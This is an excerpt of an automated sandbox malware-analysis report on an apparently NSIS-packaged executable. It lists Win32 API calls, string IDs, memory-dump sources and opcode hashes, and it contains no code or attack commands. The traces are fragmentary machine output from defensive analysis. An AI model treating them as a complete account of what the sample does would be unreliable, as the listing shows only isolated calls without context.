                                                                • Opcode Fuzzy Hash: 0185fb71cb0ebac8bb253ddb79263eb6e3c4c27c477fa06c1930d1494c9be16a
                                                                • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                  • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                  • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                  • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                  • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                  • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$Call$H7B
                                                                • API String ID: 2624150263-2436674069
                                                                • Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                • Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                • GetSysColor.USER32(?), ref: 00404863
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                • lstrlenW.KERNEL32(?), ref: 00404884
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                • SendMessageW.USER32(00000000), ref: 00404906
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                • SetCursor.USER32(00000000), ref: 00404985
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                • SetCursor.USER32(00000000), ref: 004049A1
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: Call$N
                                                                • API String ID: 3103080414-3438112850
                                                                • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                • wsprintfA.USER32 ref: 0040632D
                                                                • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
                                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                • API String ID: 2171350718-2295842750
                                                                • Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                • Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
                                                                • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                APIs
                                                                • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                • String ID: ('B
                                                                • API String ID: 1495540970-2332581011
                                                                • Opcode ID: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                • Opcode Fuzzy Hash: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                • GetSysColor.USER32(00000000), ref: 00404686
                                                                • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                • GetSysColor.USER32(?), ref: 004046B1
                                                                • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                • DeleteObject.GDI32(?), ref: 004046DB
                                                                • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                  • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 589700163-1201062745
                                                                • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                • GetTickCount.KERNEL32 ref: 00403067
                                                                • wsprintfW.USER32 ref: 00403095
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                  • Part of subcall function 00403012: MulDiv.KERNEL32(0004274B,00000064,000458C4), ref: 00403027
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                • String ID: ... %d%%
                                                                • API String ID: 722711167-2449383134
                                                                • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                • GetMessagePos.USER32 ref: 00404FA2
                                                                • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
